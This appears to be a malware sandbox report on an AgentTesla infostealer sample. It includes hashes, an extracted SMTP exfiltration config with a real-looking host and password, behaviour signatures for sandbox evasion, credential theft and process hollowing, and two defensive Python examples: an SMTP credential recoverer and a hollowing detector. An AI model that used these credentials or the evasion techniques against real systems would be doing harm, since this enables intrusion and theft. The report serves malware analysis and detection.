General

  • Target

    2909e9a7f4e544cb4089a7f05e3af83c1d6faeb5d3c0d82c0938cd369cba8d8f

  • Size

    390KB

  • Sample

    220521-bw8weaffel

  • MD5

    8448a2b6396013f5d31af44da4a324f8

  • SHA1

    b15f2cd0590d755c5f8cc11b0142ca11908d4afa

  • SHA256

    2909e9a7f4e544cb4089a7f05e3af83c1d6faeb5d3c0d82c0938cd369cba8d8f

  • SHA512

    1db98a0806d9769de88a8662b794d79da5daadbe0d8b28e9dfd53a58acd567a45102f76022887560552165e0553345b8f2afa1c416adcf6e09e276c211032d72

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.opporajasthan.in
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Systems@1234
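The extracted config above is the sample's exfiltration channel: a mailbox on mail.opporajasthan.in reached over SMTP submission (port 587). The following is an added example, not code from the report or from Triage, showing how to recover such credentials from a captured plaintext SMTP session (AUTH LOGIN and AUTH PLAIN) and tie the session back to this config. The transcripts are constructed; the mailbox name is a placeholder because the page redacts it; and the example assumes the session was seen without STARTTLS, for instance behind a TLS-intercepting sandbox proxy.

```python
import base64
import binascii
from typing import Optional

# C2 configuration as extracted on this page. The page redacts the mailbox
# name ([email protected]); the username below is a placeholder assumption.
EXTRACTED_CONFIG = {
    "protocol": "smtp",
    "host": "mail.opporajasthan.in",
    "port": 587,
    "username": "user@opporajasthan.in",  # placeholder, not the real value
    "password": "Systems@1234",
}


def b64(text: str) -> str:
    """Base64-encode a string the way SMTP AUTH expects it."""
    return base64.b64encode(text.encode()).decode()


def b64d(text: str) -> Optional[str]:
    """Decode an SMTP AUTH token; None if it is not valid base64."""
    try:
        return base64.b64decode(text, validate=True).decode(errors="replace")
    except (binascii.Error, ValueError):
        return None


# Constructed plaintext SMTP transcript (not a capture from this report) with
# 'C: ' client and 'S: ' server lines. It models the exfiltration channel:
# AUTH LOGIN against the configured mail host, then a report mail sent from
# the attacker mailbox to itself.
SESSION_LOGIN = "\n".join([
    "S: 220 mail.opporajasthan.in ESMTP ready",
    "C: EHLO DESKTOP-1A2B3C",
    "S: 250-mail.opporajasthan.in",
    "S: 250 AUTH LOGIN PLAIN",
    "C: AUTH LOGIN",
    "S: 334 " + b64("Username:"),
    "C: " + b64(EXTRACTED_CONFIG["username"]),
    "S: 334 " + b64("Password:"),
    "C: " + b64(EXTRACTED_CONFIG["password"]),
    "S: 235 2.7.0 Authentication successful",
    "C: MAIL FROM:<" + EXTRACTED_CONFIG["username"] + ">",
    "C: RCPT TO:<" + EXTRACTED_CONFIG["username"] + ">",
    "C: DATA",
    "C: Subject: PW_victim/DESKTOP-1A2B3C",
    "C: .",
    "S: 250 OK",
])

# Same channel using AUTH PLAIN with an initial response (RFC 4616):
# base64("\0user\0password"). Also constructed.
SESSION_PLAIN = "\n".join([
    "S: 220 mail.opporajasthan.in ESMTP ready",
    "C: EHLO DESKTOP-1A2B3C",
    "C: AUTH PLAIN " + b64("\0" + EXTRACTED_CONFIG["username"]
                           + "\0" + EXTRACTED_CONFIG["password"]),
    "S: 235 2.7.0 Authentication successful",
])


def recover_smtp_credentials(transcript: str) -> list:
    """Recover credentials from AUTH LOGIN and AUTH PLAIN exchanges.

    Returns one dict per completed authentication attempt with the server
    host (taken from the 220 banner), mechanism, username and password.
    """
    lines = transcript.splitlines()
    client = [l[3:].strip() for l in lines if l.startswith("C: ")]
    host = next((l.split()[2] for l in lines if l.startswith("S: 220 ")), None)
    creds = []
    k = 0
    while k < len(client):
        parts = client[k].split()
        if len(parts) >= 2 and parts[0].upper() == "AUTH":
            mech = parts[1].upper()
            if mech == "PLAIN" and len(parts) == 3:
                raw = b64d(parts[2])
                fields = raw.split("\0") if raw is not None else []
                if len(fields) == 3:  # authzid, authcid, password
                    creds.append({"host": host, "mechanism": "PLAIN",
                                  "username": fields[1], "password": fields[2]})
            elif mech == "LOGIN":
                # The username may ride on the AUTH line (initial response);
                # otherwise it is the next client line, then the password.
                if len(parts) == 3:
                    user = b64d(parts[2])
                else:
                    k += 1
                    user = b64d(client[k]) if k < len(client) else None
                k += 1
                pw = b64d(client[k]) if k < len(client) else None
                if user is not None and pw is not None:
                    creds.append({"host": host, "mechanism": "LOGIN",
                                  "username": user, "password": pw})
        k += 1
    return creds


def match_extracted_config(creds: list, config: dict) -> list:
    """Return recovered credentials that match the extracted C2 config.

    The username is redacted on the page, so the match is on host and
    password; a hit ties the network session to this AgentTesla sample.
    """
    return [c for c in creds
            if c["host"] == config["host"] and c["password"] == config["password"]]
```

Running `match_extracted_config(recover_smtp_credentials(SESSION_LOGIN), EXTRACTED_CONFIG)` returns the single LOGIN record, which is the evidence you would attach to a detection for outbound traffic to this host on 587 from a non-mail process. Tokens that are not valid base64 are dropped rather than guessed, so a half-seen handshake never yields a fabricated credential.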

Targets

    • Target

      Fwd WRONG BANK DETAIL'S.exe

    • Size

      430KB

    • MD5

      dd5e8f55df6577549de4bc6f120fbdc1

    • SHA1

      13010fa3bd4c7e1f7852d579c10505a40afa4bab

    • SHA256

      f791e41279744779b60a12e8e88ab15dd254c89acfb75ed5a3772053f8831f63

    • SHA512

      1458eff2920a357a6545425931688b2b4e37b034134d37bd697cafa06629e1ed34f4d41516943306b0241c4e90a9549644ba5af50b6f257a7c393705b612f676

    • AgentTesla

      Agent Tesla is a .NET-based remote access tool (RAT) and information stealer, with builds commonly written in Visual Basic .NET. It harvests saved credentials from browsers, email and FTP clients and exfiltrates them over SMTP, FTP or HTTP; this sample uses the SMTP account in the extracted config above.

    • AgentTesla Payload

    • Looks for VirtualBox Guest Additions in registry

      Queries the key Guest Additions creates under HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions; its presence reveals a VirtualBox guest.

    • Looks for VMWare Tools registry key

      Queries HKLM\SOFTWARE\VMware, Inc.\VMware Tools; its presence reveals a VMware guest. Both checks are a cheap way to bail out before the stealer runs under analysis.

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up the country code configured in the registry, most likely for geofencing.

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses Microsoft Outlook profiles

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Suspicious use of SetThreadContext

      Setting the thread context of another process is the hallmark of RunPE / process hollowing: a legitimate process is started suspended, its image is overwritten with the payload, the main thread's entry point is redirected with SetThreadContext, and the thread is resumed.
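The SetThreadContext signature is only meaningful in sequence with the calls around it. The following is an added example, not part of the report or of Triage's signature set, that detects the RunPE / hollowing sequence in an API-call trace by requiring the stages in order per (caller, child) pair: CreateProcess with CREATE_SUSPENDED, a write into the child, SetThreadContext on the child's thread, then ResumeThread. The trace format and its contents are constructed for the example; the choice of RegSvcs.exe as the hollowed host is an assumption, not something this report states.

```python
# Constructed API-call trace (not from this report's sandbox run). The format
# is defined here for the example: "pid|api|key=value,...|return". Process
# 4012 performs the hollowing sequence that trips "Suspicious use of
# SetThreadContext"; process 7700 sets the context of one of its own threads
# (a debugger-style hardware breakpoint) and must not be flagged.
TRACE = r"""
4012|CreateProcessW|image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,flags=0x4,child_pid=5120,tid=5124|1
4012|NtUnmapViewOfSection|target_pid=5120,base=0x400000|0
4012|VirtualAllocEx|target_pid=5120,base=0x400000,size=0x1e000,protect=0x40|0x400000
4012|WriteProcessMemory|target_pid=5120,base=0x400000,size=0x200|1
4012|WriteProcessMemory|target_pid=5120,base=0x401000,size=0x1c000|1
4012|SetThreadContext|target_pid=5120,tid=5124,eax=0x40a3c0|1
4012|ResumeThread|target_pid=5120,tid=5124|0
7700|OpenThread|target_pid=7700,tid=7704|0x1a8
7700|SetThreadContext|target_pid=7700,tid=7704,dr0=0x7ff6c0001000|1
"""

CREATE_SUSPENDED = 0x4  # dwCreationFlags bit for CreateProcess

# Stages in the order hollowing must take; 'write' may repeat.
STAGES = ("create_suspended", "write", "set_context", "resume")
STAGE_OF_API = {
    "WriteProcessMemory": "write",
    "NtMapViewOfSection": "write",      # section-mapping variant of the write
    "SetThreadContext": "set_context",
    "NtSetContextThread": "set_context",
    "ResumeThread": "resume",
    "NtResumeThread": "resume",
}


def parse_trace(text: str) -> list:
    """Parse the pipe-delimited trace into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, api, args, ret = line.split("|", 3)
        kv = dict(item.split("=", 1) for item in args.split(",") if item)
        events.append({"pid": int(pid), "api": api, "args": kv, "ret": ret})
    return events


def detect_hollowing(events: list) -> list:
    """Flag (caller, child) pairs that complete the hollowing sequence in order.

    A stage is credited only after every earlier stage has been seen for the
    same pair, so a SetThreadContext without a suspended child, a resume that
    precedes the write, or a process touching its own threads never reaches
    'resume' and is not reported.
    """
    state = {}
    findings = []
    for ev in events:
        caller, args = ev["pid"], ev["args"]
        if ev["api"].startswith("CreateProcess"):
            if int(args.get("flags", "0"), 16) & CREATE_SUSPENDED:
                child = int(args["child_pid"])
                state[(caller, child)] = {"stages": ["create_suspended"],
                                          "image": args.get("image"),
                                          "tid": args.get("tid")}
            continue
        stage = STAGE_OF_API.get(ev["api"])
        target = args.get("target_pid")
        if stage is None or target is None or int(target) == caller:
            continue
        st = state.get((caller, int(target)))
        if st is None or stage in st["stages"]:
            continue
        prereqs = STAGES[:STAGES.index(stage)]
        if all(s in st["stages"] for s in prereqs):
            st["stages"].append(stage)
            if stage == "resume":
                findings.append({"caller": caller, "target": int(target),
                                 "image": st["image"], "tid": st["tid"],
                                 "technique": "process hollowing (RunPE)"})
    return findings
```

`detect_hollowing(parse_trace(TRACE))` yields one finding for pid 4012 hollowing child 5120. Keying state on the (caller, child) pair rather than on SetThreadContext alone is what keeps debuggers and thread-pool code out of the results; in a real pipeline the hollowed child's image path is the value to pivot on, since AgentTesla-style loaders pick a trusted signed host for the payload.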

MITRE ATT&CK Matrix (ATT&CK v6)

The count is the number of matched behaviour signatures mapped to each technique.

  Tactic                Technique                        Count  ID
  Execution             Scheduled Task                   1      T1053
  Persistence           Scheduled Task                   1      T1053
  Privilege Escalation  Scheduled Task                   1      T1053
  Defense Evasion       Virtualization/Sandbox Evasion   2      T1497
  Credential Access     Credentials in Files             3      T1081
  Discovery             Query Registry                   5      T1012
  Discovery             Virtualization/Sandbox Evasion   2      T1497
  Discovery             System Information Discovery     4      T1082
  Discovery             Peripheral Device Discovery      1      T1120
  Collection            Data from Local System           3      T1005
  Collection            Email Collection                 1      T1114

Tasks